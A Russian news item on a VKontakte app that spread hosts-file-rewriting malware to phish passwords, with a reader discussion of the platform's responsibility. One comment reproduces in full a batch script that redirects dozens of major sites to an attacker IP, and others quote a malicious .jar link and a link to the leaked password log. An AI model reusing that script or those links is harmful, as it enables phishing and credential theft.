Приложение сломало пользователей «В контакте» (+)

Приложение «Подводный мир 2», заблокированное на данный момент администрацией «В контакте», подсадило вирус и украло пароли более чем у 130 тысяч пользователей.

По информации «Лаборатории Касперского», вирус редактировал файл hosts, прописывая туда строки 83.133.120.252 vkontakte.ru и 83.133.120.252 odnoklassniki.ru.

В результате этого, пользователь, зашедший на якобы «В контакте», оставлял свой пароль злоумышленникам, также ему выдавалось предупреждение о блокировке аккаунта с требованием отправить для разблокировки SMS на короткий номер стоимостью около 10 долларов.

Пароли пользователей при этом записывались в общедоступный файл (сейчас закрыт), на хостинге Greatnet, скачав который любой мог ознакомиться с данными пользователей. При этом про пользователей «Одноклассников» то ли забыли, то ли сочли неинтересными, аналогичный лог был пуст.

Лучшие комментарии

  • Контекст комментария

    Pavel Durov VK

    ВКонтакте был и остается самым безопасным местом в сети. Внутри ВКонтакте вирус невозможно подцепить даже теоретически. Только выйдя за его пределы и игнорировав все предупреждения, можно установить себе заразу. Пользователям в описании приложения предлагалась ссылка: «необходим новый флеш-плеер, скачать здесь». С него пользователи переходили на наше предупреждение о небезопасной ссылке, дальше на сторонний сайт (разумеется, не Adobe), дальше в некоторых случаях игнорировали предупреждение браузера и игнорировали предупреждение от ОС, устанавливая вирус. ВКонтакте API или какие-то мифические «внутренние уязвимости» ВКонтакте здесь не причем и являются в данном контексте плодом воображения непрофессиональных журналистов. Имело место стандартное для всех вирусов распространение некой внешней ссылки и ее игнорирование некоторыми неосторожными пользователями. В этой истории возникает закономерный вопрос — зачем хакерам делать публичным список паролей, если сразу после этого их сменят и затронутых пользователей предупредят? В этом случае они просто лишаются десятков тысяч спам-ботов, неся убытки. Реально было около 20 тысяч работающих паролей, все они были сброшены, пользователи были предупреждены в течение суток. Это одна двадцатая процента пользователей, причем часть из них и так была ботами. Вообще же в Контакте в день регистрируется в 3−4 раза больше пользователей, чем указанная цифра. Поэтому на новостной повод данный «вирус» не тянет никак. Похоже, шумиха такого рода имеет смысл только как чья-то пиар-акция. Дополнительные меры, о которых шла речь выше (ssl, измененная работа с cookies), разумеется, внедряются, только к такого рода «вирусам» они не имеют никакого отношения и никого бы ни от чего в данном случае не спасли. На самом деле, выход один — постепенное повышение компьютерной грамотности пользователей.

  • Контекст комментария

    Petr ¹

    2 varg Проблемы пользователей, связанные с незнанием основ сетевой безопасности, которые и вызвали данный информационный повод, мы конечно решить не сможем. Но вот сама социальная сеть вполне могла бы профессиональнее подходить ко многим вопросам. Стоит учитывать значимость самой сети и масштабы последствий в случае компрометаций. Поэтому ответственность основателей сети должна расти. Я приведу несколько моментов, которые можно решить со стороны социальной сети: 1. Проверка слабых паролей. Никто не мешает проверять качество пароля при регистрации и профилактически проверить эти пароли у всех пользователей. У кого слабые — предложить поменять на более приличные. Тетя Мотя при регистрации вряд ли догадыватся, что ее «123456» является самым популярным паролем в мире. Кто, как не система может сделать (и должна) такое предупреждение? 2. Стоит переработать принципы работы с cookie на сайте. Что снизить и количество XSS и другие бредовые уязвимости. 3. Авторизацию пора проводить через HTTPS, как это давно принято на всех серьезных системах. Есть и другие претензии к безопасности этой системы. Часть которых не решена до сих пор. А насчет мифов, не стоит делать такие хлесткие заявления, это не правда — дыры были и есть, Вы просто не в курсе. И все «вирусные» эпидемии, которые происходят регулярно, вызваны именно проблемами безопасности системы. А если проблема с файлом hosts так актуальна, кто мешает сделать бесплатный чекер этого файла, и раздавать с сайта? Кто хочет — делает, кто не хочет — рассказывает о причинах. Доверия мало к этой сети именно из-за ярких пробем с безопасностью.

Добавить 105 комментариев

  • Ответить
    Альтер Эго

    зашел по ссылке на приложение — «Приложение Подводный мир 2 убрано с Вашей страницы.» у меня его никогда и не было. Весело с Павликом тут, однако.

  • Ответить
    Альтер Эго

    А Дуров не хочет пароли спалившимся поменять? Или у «В контакте» этого списка нет? И вообще, интересно, что тут делать — валидизировать пользователей по почте уже нельзя, но и оставлять им пароли — тоже стремно.

  • Ответить

    Судя по тому как файлег разошёлся по сети, думаю менять всем нужно. у меня последняя версия файлика от 19:02, 290 тысяч строк. проверил пару почтовых адресов, реально подходит :(rambler.ru и yandex.ru обещали меры принять.

  • Ответить
    Альтер Эго

    при чем, что забавно, письмо с новыми паролями выслали на email ящики, на которых стоят старые пароли.

  • Ответить

    Спустя сутки после этого масштабного увода паролей пользователи так и не получили никаких уведомлений от администрации сети.

  • Ответить
    Юрий Синодов Основатель Roem.ru, sinodov.com

    Вообще, сменить пароли, из-за их соответствия почте, явно недостаточно, так как пароли отправленные на почту с совпадающими паролями, не гарантируют того, что аккаунтом не завладеет злоумышленник. Думаю, что администрации ВК стоит договориться с провайдерами почт, пробить спалившихся на идентичность паролей. Если разные — обновить пароль и все. Если одинаковые — ставить блок на изменение анкет, разослать пароли по SMS (если есть номер сотового телефона) А вот если сотовый не указан и контактов кроме почты нет — то что тут делать — совершенно неясно. Думаю, поэтому ВК пока ничего не пишет, думает.

  • Ответить

    Вот на руформаторе в комментах (http://ruformator.ru/news/article05814/default.asp) есть ссылка на файл (http://letitbit.net/download/7657.75b91531f81b1fa268ca81ec0/logggz.rar.html). to zhecka, to sinodov: Похоже единственный кто хоть как-то среагировал это Касперский («А вот если сотовый не указан и контактов кроме почты нет», то может у них Касперский стоит). Так что +100 очков лояльности к Касперскому. Впрочем у антивирусов работа такая чужие дыры закрывать…

  • Ответить

    Интересно, собранная база украденных паролей является «свободной» информацией? Ознакомление с этими данными и их использование является законным? Еще интересно, Вконтакте планирует взрослеть в области безопасности? Если да, то когда это случиться?

  • Ответить
    Юрий Синодов Основатель Roem.ru, sinodov.com

    К hitman — я, в принципе, тоже думаю, что ответственность «В контакте», который узнал о компрометации паролей, формально может ограничиться рассылкой новых паролей. То что они совпадают с почтой — проблема негров.

  • Ответить
    126

    Вообще-то отношение к размещаемым приложениям довольно странное. Учитывая некоторые аспекты в безопасности флэша особенно.

  • Ответить
    pol

    Вот-вот. Страницы в Вконтакте можно создать новые, ничего ценного на них все равно нет. «Негры» с совпадающими паролями получили хороший урок. Теперь будут более внимательно читать пояснения о безопасности на сайтах и использовать несколько ящиков. Ребята, которые создали такой приложение для Вконтакта, умные однако: знали, что времени у них мало и выставили сразу 10 долларов за SMS. А вы говорите проблема с монетизацией =)

  • Ответить
    Юрий Синодов Основатель Roem.ru, sinodov.com

    По-моему 10 долларов за SMS — это стандартная цена при разводе пользователей. Иногда, правда, делают приличный вид: берут 10 рублей в сутки. На месяц вперед

  • Ответить

    >Впрочем у антивирусов работа такая чужие дыры закрывать… К сожалению ни один из антивирусов такого делать пока не может. Их работа в другом. >Еще интересно, Вконтакте планирует взрослеть в области безопасности? Если да, то когда это случиться? Вы путаете причинно-следственную связь. Вконтакте здесь вообще не причем, и при этом является очень неплохо защищенной сетью. Мифы о её дырявости вызваны повальной глупостью и неосторожностью пользователей помноженную на их количество. Т.е. человек поставил себе ерунду какую-то — потерял аккаунт или деньги отправил злоумышленнику, понятное дело виновата сеть. Конкретно уязвимостей самой сети за всю её историю можно по пальцам посчитать.

  • Ответить

    @varg: я что-то недогоняю, приложение «Подводный мир-2» прилетало к пользователю святым духом или им эту «ерунду какую-то» показывал любимый сайт? Я думал что это просто абстрактный вирус, а уточнение про приложение конкретно доставляет.

  • Ответить

    2 varg Проблемы пользователей, связанные с незнанием основ сетевой безопасности, которые и вызвали данный информационный повод, мы конечно решить не сможем. Но вот сама социальная сеть вполне могла бы профессиональнее подходить ко многим вопросам. Стоит учитывать значимость самой сети и масштабы последствий в случае компрометаций. Поэтому ответственность основателей сети должна расти. Я приведу несколько моментов, которые можно решить со стороны социальной сети: 1. Проверка слабых паролей. Никто не мешает проверять качество пароля при регистрации и профилактически проверить эти пароли у всех пользователей. У кого слабые — предложить поменять на более приличные. Тетя Мотя при регистрации вряд ли догадыватся, что ее «123456» является самым популярным паролем в мире. Кто, как не система может сделать (и должна) такое предупреждение? 2. Стоит переработать принципы работы с cookie на сайте. Что снизить и количество XSS и другие бредовые уязвимости. 3. Авторизацию пора проводить через HTTPS, как это давно принято на всех серьезных системах. Есть и другие претензии к безопасности этой системы. Часть которых не решена до сих пор. А насчет мифов, не стоит делать такие хлесткие заявления, это не правда — дыры были и есть, Вы просто не в курсе. И все «вирусные» эпидемии, которые происходят регулярно, вызваны именно проблемами безопасности системы. А если проблема с файлом hosts так актуальна, кто мешает сделать бесплатный чекер этого файла, и раздавать с сайта? Кто хочет — делает, кто не хочет — рассказывает о причинах. Доверия мало к этой сети именно из-за ярких пробем с безопасностью.

  • Ответить
    Юрий Синодов Основатель Roem.ru, sinodov.com

    Да, кстати — https, да еще и вот такого вида, было бы неплохо прикрутить Из глобального — почта и прочие коммуникационные сервисы должны, наверное, генерировать пароли самостоятельно, не полагаясь на пользователя

  • Ответить
    Альтер Эго

    Либо в Лаборатории Касперского совсем считать не умеют, либо им хочется назвать число побольше, чтобы больше людей купили антивирусы. Они взяли и тупо поделили число строк на 2, увидев, что каждая вторая пустая. Но очевидно, что большинство людей пытается зайти несколько раз, так что в этом файле много одинаковых строк, и ещё много строк с одим логином и разными паролями, не говоря о всяком мусоре. Так что разных логинов там на порядок меньше, и 130 тысяч — явно завышенная оценка. Так что и их утверждение о точном источнике вируса звучит сомнительно. Мне, например, ссылка на вирус пришла вчера в ICQ. А если ссылку на тот файл кто-нибудь выложит здесь и предложит скачать, виноват будет Синодов?

  • Ответить
    Юрий Синодов Основатель Roem.ru, sinodov.com

    Тут проблема как с Яндексом, которую часто вспоминают — делая сервис, который может усиливать чье-то негативное влияние, надо думать и о том, что часть ответственности за усиление этого влияния, будет возложена на сервис

  • Ответить
    Альтер Эго

    При регистрации в контакте предупреждают, если пароль простой, а после регистрации поменять его на варианты типа 123456 нельзя. А с https есть две проблемы: во-первых, во всяких мобильных телефонах оно может не поддерживаться, во-вторых, на поддельном сайте можно просто показывать ту же форму через http, большинство жертв не заметит разницы. Хотя, конечно, польза от https есть.

  • Ответить

    $ sort -u log.txt | wc -l 55073 не 130.000, но тоже немало. По поводу безопасности: Безопасность такая штука, что денег на нее уходит много, а приносит 0. Поэтому пока не припрет ей и не занимаются. Какой бы хороший пароль не был, от фишинговых сайтов он не спасет. По поводу безопасности авторизации — могут на платежные сервисы равняться, epass, webmoney (хотя тут слабовата защита) и др. Ну и, конечно, авторизация через смс, это решило бы кучу проблем (и создало бы новые). Скажем одно смс минимальной стоимости давало бы ключ к авторищации на 5 дней.

  • Ответить

    >я что-то недогоняю, приложение «Подводный мир-2» прилетало к пользователю святым духом или им эту «ерунду какую-то» показывал любимый сайт? С таким же успехом можно легко обвинить mail.ru в распространении вирусов, если кто-то отправляет со ящика этой системы вирусы или еще круче, в распространении гриппа воздушно-капельным путем виноват воздух. Petr, Давайте предметно — здесь >Стоит переработать принципы работы с cookie на сайте. Что снизить и количество XSS и другие бредовые уязвимости. Каково количество xss и примеры их сколько-нибудь массового использования? Только факты. >И все «вирусные» эпидемии, которые происходят регулярно, вызваны именно проблемами безопасности системы. >А если проблема с файлом hosts так актуальна, кто мешает сделать бесплатный чекер этого файла, и раздавать с сайта? Давайте тогда уж опять примеры вирусных эпидемий и в чем конкретно вина вконтакте. А насчет файлика hosts вы вообще говорите ерунду. Это была слишком скоротечная атака, чтобы провернуть такое, да и подобные вещи это вообще не в их компетенции. Давайте предложим какому-нибудь рапидшаре выпускать чекеры и сканеры после каждого случая распространения через них вирусов?

  • Ответить

    > С таким же успехом можно легко обвинить mail.ru в распространении вирусов И поэтому на mail.ru таки стоит антивирус. Кроме того, с массовыми рассылками спама от своих пользователей они тоже борются (с какой-то эффективностью, но она много больше нуля), а не говорят «не, ну это наши пользователи рассылают, что мы можем сделать…». И не только на mail.ru. Можно невинно закатывать глазки, но если приложение просто брало и раздавалось с сайта контакта стандартным образом — это обычный такой гигантский факап. Бывает, что уж там. Посмотрим, как будут ликвидироваться последствия (ну и как много подобных приложений появится в ближайшие полгода, да). Если нестандартным (вконтакт «хакнули» каким-то образом), то это не гиганский, а обычный факап.

  • Ответить
    Альтер Эго

    grep @ log.txt.cs02 | cut -d’:’ -f 1 | sort -u | wc -l 42875 Проблема с подменой /etc/hosts существует давно, и следить за ней по идее должны антивирусы. Тем не менее, вчера мой Аутпост ничего не сказал на добавление того IP-адреса для проверки. Вот, кстати, апрельский список подменяемых сайтов — точно ли виноват один вконтакте? И уж «Подводного мира» тогда точно не было: @echo off echo 82.146.44.61 mail.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.mail.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.yandex.ru >> %windir%system32driversetchosts echo 82.146.44.61 yandex.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.vkontakte.ru >> %windir%system32driversetchosts echo 82.146.44.61 vkontakte.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.odnoklasniki.ru >> %windir%system32driversetchosts echo 82.146.44.61 odnoklasniki.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.google.ru >> %windir%system32driversetchosts echo 82.146.44.61 google.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.rambler.ru >> %windir%system32driversetchosts echo 82.146.44.61 rambler.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.ya.ru >> %windir%system32driversetchosts echo 82.146.44.61 ya.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.google.com >> %windir%system32driversetchosts echo 82.146.44.61 google.com >> %windir%system32driversetchosts echo 82.146.44.61 http://www.pochta.ru >> %windir%system32driversetchosts echo 82.146.44.61 pochta.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.bigmir.net >> %windir%system32driversetchosts echo 82.146.44.61 bigmir.net >> %windir%system32driversetchosts echo 82.146.44.61 http://www.liveinternet.ru >> %windir%system32driversetchosts echo 82.146.44.61 liveinternet.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.zaycev.net >> %windir%system32driversetchosts echo 82.146.44.61 zaycev.net >> %windir%system32driversetchosts echo 82.146.44.61 http://www.wikipedia.org >> %windir%system32driversetchosts echo 82.146.44.61 wikipedia.org >> %windir%system32driversetchosts echo 82.146.44.61 http://www.dating.ru >> %windir%system32driversetchosts echo 82.146.44.61 dating.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.24open.ru >> %windir%system32driversetchosts echo 82.146.44.61 24open.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.mirtesen.ru >> %windir%system32driversetchosts echo 82.146.44.61 mirtesen.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.qip.ru >> %windir%system32driversetchosts echo 82.146.44.61 qip.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.start.qip.ru >> %windir%system32driversetchosts echo 82.146.44.61 start.qip.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.torrents.ru >> %windir%system32driversetchosts echo 82.146.44.61 torrents.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.rutube.ru >> %windir%system32driversetchosts echo 82.146.44.61 rutube.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.smotri.com >> %windir%system32driversetchosts echo 82.146.44.61 smotri.com >> %windir%system32driversetchosts echo 82.146.44.61 http://www.mylivepage.ru >> %windir%system32driversetchosts echo 82.146.44.61 mylivepage.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.ucoz.ru >> %windir%system32driversetchosts echo 82.146.44.61 ucoz.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.intv.ru >> %windir%system32driversetchosts echo 82.146.44.61 intv.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.dwar.ru >> %windir%system32driversetchosts echo 82.146.44.61 dwar.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.6008help.ru >> %windir%system32driversetchosts echo 82.146.44.61 6008help.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.nevosoft.ru >> %windir%system32driversetchosts echo 82.146.44.61 nevosoft.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.championat.ru >> %windir%system32driversetchosts echo 82.146.44.61 championat.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.sms911.ru >> %windir%system32driversetchosts echo 82.146.44.61 sms911.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.eurosport.ru >> %windir%system32driversetchosts echo 82.146.44.61 eurosport.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.kinopoisk.ru >> %windir%system32driversetchosts echo 82.146.44.61 kinopoisk.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.kinozal.tv >> %windir%system32driversetchosts echo 82.146.44.61 kinozal.tv >> %windir%system32driversetchosts echo 82.146.44.61 http://www.musicmp3.spb.ru >> %windir%system32driversetchosts echo 82.146.44.61 musicmp3.spb.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.hh.ru >> %windir%system32driversetchosts echo 82.146.44.61 hh.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.depositfiles.com >> %windir%system32driversetchosts echo 82.146.44.61 depositfiles.com >> %windir%system32driversetchosts echo 82.146.44.61 http://www.dom2.ru >> %windir%system32driversetchosts echo 82.146.44.61 dom2.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.help-cmc.ru >> %windir%system32driversetchosts echo 82.146.44.61 help-cmc.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.nigma.ru >> %windir%system32driversetchosts echo 82.146.44.61 nigma.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.aport.ru >> %windir%system32driversetchosts echo 82.146.44.61 aport.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.gogo.ru >> %windir%system32driversetchosts echo 82.146.44.61 gogo.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.go.mail.ru >> %windir%system32driversetchosts echo 82.146.44.61 go.mail.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.pooisk.com >> %windir%system32driversetchosts echo 82.146.44.61 pooisk.com >> %windir%system32driversetchosts echo 82.146.44.61 http://www.ru.yahoo.com >> %windir%system32driversetchosts echo 82.146.44.61 ru.yahoo.com >> %windir%system32driversetchosts echo 82.146.44.61 http://www.sms.mts.ru >> %windir%system32driversetchosts echo 82.146.44.61 sms.mts.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.a1agregator.ru >> %windir%system32driversetchosts echo 82.146.44.61 a1agregator.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.narod.ru >> %windir%system32driversetchosts echo 82.146.44.61 narod.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.smsrent.ru >> %windir%system32driversetchosts echo 82.146.44.61 smsrent.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.smshelps.ru >> %windir%system32driversetchosts echo 82.146.44.61 smshelps.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.a1help.ru >> %windir%system32driversetchosts echo 82.146.44.61 a1help.ru >> %windir%system32driversetchosts echo 82.146.44.61 login.oscar.aol.com >> %windir%system32driversetchosts echo 82.146.44.61 http://www.login.oscar.aol.com >> %windir%system32driversetchosts echo 82.146.44.61 login.oscar.aol.com:5190 >> %windir%system32driversetchosts echo 82.146.44.61 login.icq.com >> %windir%system32driversetchosts echo 82.146.44.61 http://www.login.icq.com >> %windir%system32driversetchosts echo 82.146.44.61 login.login.icq.com:5190 >> %windir%system32driversetchosts echo 82.146.44.61 http://www.glebber.info >> %windir%system32driversetchosts echo 82.146.44.61 glebber.info >> %windir%system32driversetchosts echo 82.146.44.61 http://www.xqa.ru >> %windir%system32driversetchosts echo 82.146.44.61 xqa.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.iqonline.ru >> %windir%system32driversetchosts echo 82.146.44.61 iqonline.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.sup-fd.ru >> %windir%system32driversetchosts echo 82.146.44.61 sup-fd.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.nwhelps.ru >> %windir%system32driversetchosts echo 82.146.44.61 nwhelps.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.sup24.ru >> %windir%system32driversetchosts echo 82.146.44.61 sup24.ru >> %windir%system32driversetchosts echo 82.146.44.61 http://www.smssupport.su >> %windir%system32driversetchosts echo 82.146.44.61 smssupport.su >> %windir%system32driversetchosts

  • Ответить
    Альтер Эго

    2 lexa > Можно невинно закатывать глазки, но если приложение просто брало и раздавалось с сайта контакта > стандартным образом — это обычный такой гигантский факап. Бывает, что уж там. Посмотрим, как будут > ликвидироваться последствия (ну и как много подобных приложений появится в ближайшие полгода, да). > Если нестандартным (вконтакт «хакнули» каким-то образом), то это не гиганский, а обычный факап. Где-то писали, что это приложение предлагало пользователям загрузить «новый flash-player», т.е. само по себе оно, вообще говоря, не вредоносное, ему надо поверить, скачать и запустить. Таким способом много чего и много где втюхивается. Распространяет ли Яндекс вирусы, виноват ли он, если там есть такое? http://yandex.ru/yandsearch?rpt=rad&text= или такое? http://yandex.ru/yandsearch?text=++&stpar2=h0tm7s1&stpar4=s1

  • Ответить

    >И поэтому на mail.ru таки стоит антивирус. Если они все-таки пропустят вирус то это будет опять же недостаток антивируса, а не mail.ru. Тот факт что у вконтакте нет антивирусных проверок, соглашусь, недостаток целостности безопасности, но не уязвимость конкретной системы как таковая. Про спам отдельная история. В контакте со спамом борятся (причем спам идет через базовые возможности, а не через уязвимости) и это не уязвимость, а суть вредоносное действие. Т.е. не препдосылка, а уже эффект. Мы же об уязвимостях т.е. о предпосылках. >Можно невинно закатывать глазки, но если приложение просто брало и раздавалось с сайта контакта стандартным >образом — это обычный такой гигантский факап. Факап. Надо думать как предотвратить. Способ по факту один — жесткая ручная модерация. Ибо вредоносных эффектов может быть уйма (как например сканером определить что приложение маскируется под плагин для платежной системы, к примеру?) и в реальности не даст 100% эффекта. Для API это всего лишь контейнер флешовый где может делаться что угодно, в том числе с разрешения пользователя с ведома флеш-плеера, вконтакте тут только может ограничить манипуляции с использованием контейнеров на страницах, что по моему мнению делается вполне успешно. Если кто не согласен, конкретные примеры использования…

  • Ответить

    Можно продолжать отмазываться (аналогии ваши хромают, сколько-нибудь близкой аналогией будет вирусный флэш-баннер в интерфейсе яндекса). Но я готов поспорить, что — либо вконтакте быстро одумается (введет модерацию приложений или еще что-то такое) — либо таких приложений скоро будут сотни… и вконтакте одумается. Почему они не одумались заранее — мне неведомо.

  • Ответить

    @varg: если флэш небезопасен (я ничего в нем не понимаю) и, в частности, может предлагать скачать «новый плейер» — значит нужна жесткая премодерация. Может быть не всего, а только тех приложений, которые набрали какую-то популярность (но лимит довольно низкий, несколько сот человек, я думаю). Но просто с таким эффектом (мультипликатором аудитории), как у вконтакта — нельзя делать вид, что это не их проблема (или что проблемы вовсе нет). Тред на дваче, на который были ссылки в коментах вебпланеты — просто ЖОГ.

  • Ответить

    lexa: да причём тут flash? кто будет проверять руками сотни приложений? программеры Вконтакте? сомнительно мне. это как плагин для ff, хочешь ставишь, хочешь нет. никто не заставляет. схватил какую-то гадость — сам себе злобный буратина.

  • Ответить

    Ну вот пользователи уже проверили одно приложение на себе. Эффект потрясающий. Значит обычные пользователи — не должны. Ладно, сейчас мы уже по десятому кругу пойдем, не вижу смысла повторяться еще раз.

  • Ответить

    >либо вконтакте быстро одумается (введет модерацию приложений или еще что-то такое) Есть, конечно же. Давно. Только где взять столько экспертов чтобы понимать что вредно, а что нет. Ведь синтез вредоносных действий может быть очень нестандартен и хитер. Нужна экспертная оценка. >если флэш небезопасен Да, как и Gecko, WebKit и т. п. Как любой софт есть-бывают проблемы, но очень часто не только уязвимости, а различный …jacking, т.е. мошенническое побуждение пользователя к выполнению вреного для него действия. >Может быть не всего, а только тех приложений, которые набрали какую-то популярность (но лимит довольно низкий, >несколько сот человек, я думаю). Ключевой вопрос — как оно стало популярным? Если CSRF — тогда вопросы к Вконтакте, если другими способами тогда надо анализировать его. В любом случае — разговор начался с того что это НЕ УЯЗВИМОСТЬ сети Вконтакте, что есть факт и что не предполагает что ЭТО НЕ ПРОБЛЕМА сети. Проблема, надо думать, но сделать они по факту могут немного. zhecka >кто будет проверять руками сотни приложений? По факту — эксперты. Где их взять? Оно того стоит?

  • Ответить

    > схватил какую-то гадость — сам себе злобный буратина. Это очень дурная манера. Такая же как и при фильтрации гадостей в поисках. Конечно, кто же виноват что пользователь их ищет и они популярны. Когда люди болеют им не говорят что нехер было заболевать и чтобы быть здоровым надо просто не болет — их, что интересно, лечат и учать профилактике. Не правди ли это разумно и конструктивно?

  • Ответить

    >либо таких приложений скоро будут сотни… и вконтакте одумается. Не будет. Оно же не просто. тово. стать популярным. Элементарная капча при добавлении себе приложения в профиль спасет от массы способов. А вот как оно было в этой атаке мне интересно очень, может кто в курсе. Как оно расползлось?

  • Ответить

    не соглашусь. если вы изначально снимаете шлюху на ленинградке, то должны понимать, что 1 шанс из 100, что вы ничего не подцепите. Если дядя угощает конфеткой и предлагает покатать в машине, кто виноват если ребенок сядет в машину? По моему основы собственной безопасности детям объясняют в детстве. И плохи те родители которые это детям не объяснили. прав ?

  • Ответить
    Альтер Эго

    2 lexa: Представьте себе прямоугольное окно, в котором написано: «Для запуска этого приложения необходимо скачать новый плеер». И большая кнопка: «Скачать». Вот это оно и есть, тут не надо разбираться во флеше. То же самое можно сделать красиво в wiki-разметке, или на любом бесплатном хостинге — предлагаете их все закрыть? Или вот icq позволяет, только что пришло: — 467520186 (20:56:14 31/07/2009) Запрос авторизации Солнышко Привет)) Мы как-то с тобою встречали Я Вика если не понял кто я вот глянь http://4pok.cn/10406/foto.jar — Надо и его закрыть? Или вот Яндекс позволяет выкладывать: http://vkonreting.narod.ru/kak.txt — загружено в мае, и ведь очевидно, что проверить такой скрипт антивирусом — задача технически не более сложная, чем распознать плохое приложение на флеше. Но ведь лежит же. Я больше скажу: всякие разные интернет-протоколы, от HTTP и SMTP до собственно IP — не безопасны, потому что их создавали для совсем других целей и о задачах безопасности не думали. Так что же, раз создатели ARPANET, DNS и Windows не смогли всего этого предусмотреть, они виноваты и надо всё это закрыть и запретить?

  • Ответить
    Alex Kruglov ВКонтакте

    Приложения вконтакте уже премодерируются. По умолчанию все ссылки неактивны. То есть кликнуть и перейти куда то пользователь не может. Как приложение могло кинуть пользователя на левый сайт? Вариант 1) Пользователю давалась текстовая ссылка для скачаивания плеера — крайне маловероятно что 122 тысячи хомячков сделали это. Если сделали то это полностью проблема хомячков. Вариант 2) Приложение прошло премодерацию и было замененено на другое. Опять таки маловероятно, ибо там тогда должна была стоять заглушка — (ибо приложение было бы копией http://vkontakte.ru/app647544) — что противоречит правилам модерации. Вообще же заведомо пользователи устанавливающие «Счастливого фермера 100500», «Узнай где твой друг по номеру мобильного», «Читай чужую переписку» и прочую хрень откровенные идиоты. Неудивительно что пасс у них везде один и тот же, паника и вопли до небес, а ушерб то откровенно минимален в 99%. Имзо ни один нормальный пользователь не введёт свой пасс если он знает что эта процедура не нужна. А если ввёл — то есть простая аналогия — сел на 71-й автобус вместо 77-го (не посмотрел), отдал деньги за билет, опоздал на встречу — так кого теперь ругать? Водителя автобуса? Директора автобусного парка? Или всё-таки свою невнимательность?

  • Ответить
    Alex Kruglov ВКонтакте

    varg, А вот реально способ расползания да, интересен — скорее всего взломали профайл разработчика какого нить довольно полулярного приложения (на уровне красот симметри (http://vkontakte.ru/app127325)) и перезалили совсем другое приложение. Потому как счастливые фермеры 2 давно не получают более 1000 юзеров.

  • Ответить

    @sinodov >Тут проблема как с Яндексом, которую часто вспоминают — делая сервис, который может усиливать чье-то негативное влияние, надо думать и о том, что часть ответственности за усиление этого влияния, будет возложена на сервис, А как же ЯППБ? Прикидываются, понимаешь, сверхпроводниками. Не хотят брать ответственность. >Из глобального — почта и прочие коммуникационные сервисы должны, наверное, генерировать пароли самостоятельно, не полагаясь на пользователя, А юзер зайдет на сервис и сразу его поменяет на дату рождения. Какой в итоге эффект? >3. Авторизацию пора проводить через HTTPS, как это давно принято на всех серьезных системах. Вы знаете, вы рассуждаете штампами. Я вам докладываю. HTTPS спасает ровно от одной вещи — от перехвата отправленных данных в пути. Все. Детально, чтобы никто ваш трафик «почитать» не смог. Это на практике не такая уж и распространенная вещь — когда вас «слушают»: как примеры, админы ваши, сниффинг в незащищенном вайфае и т. п. Это не массово, однако все же среднекритичный недостаток. Но не «адская дыра» уверяю. Не предлагаете же вы работать пользователям с ключами личными чтобы туда без него просто не пускали и кража пароля потеряет смысл? >Проверка слабых паролей. Кто, как не система может сделать (и должна) такое предупреждение? Нешто вы хотите сказать что вконтакте можно брутфорсить по малым длинам? >Есть и другие претензии к безопасности этой системы. Часть которых не решена до сих пор. >А насчет мифов, не стоит делать такие хлесткие заявления, это не правда — дыры были и есть, Вы просто не в курсе. Просвещайте. Приводите примеры, раз «мы» не в курсе. Иначе, извините, обсуждать нечего. Наличие у сервиса xss — рабочий момент, другой вопрос насколько практичны они и какой резонанс могут вызвать. Приводите примеры эпидемий или элементарно эксплуатируемых уязимостей.

  • Ответить

    to cryuglov: Не 122 тысячи, а всего 42. > А если ввёл — то есть простая аналогия — сел на 71-й автобус вместо 77-го (не посмотрел), отдал деньги за билет, опоздал на встречу — так кого теперь ругать? Водителя автобуса? Директора автобусного парка? Или всё-таки свою невнимательность? Думаю никто не спорит, что виноват разработчик приложения. Его как-то совсем упустили из виду, интересно, какие данные на него есть во вконтакте, паспорт, фио, номер телефона? После того как приложение становится массовым, имхо, оно должно быть жестко связано с конкретным человеком (для регистрации домена на руцентре, например, паспорт требуют, а иногда даже и показать просят, тоже самое в яндекс-деньгах и т. д.). ЗЫ: А если легко украсть аккаунт разработчика то это уже вина вконтакте.

  • Ответить
    Альтер Эго

    а господина Дурова в лучших комментариях мы не дождемся? Паша, выходи! Паша! молчит, не дает ответа….((

  • Ответить
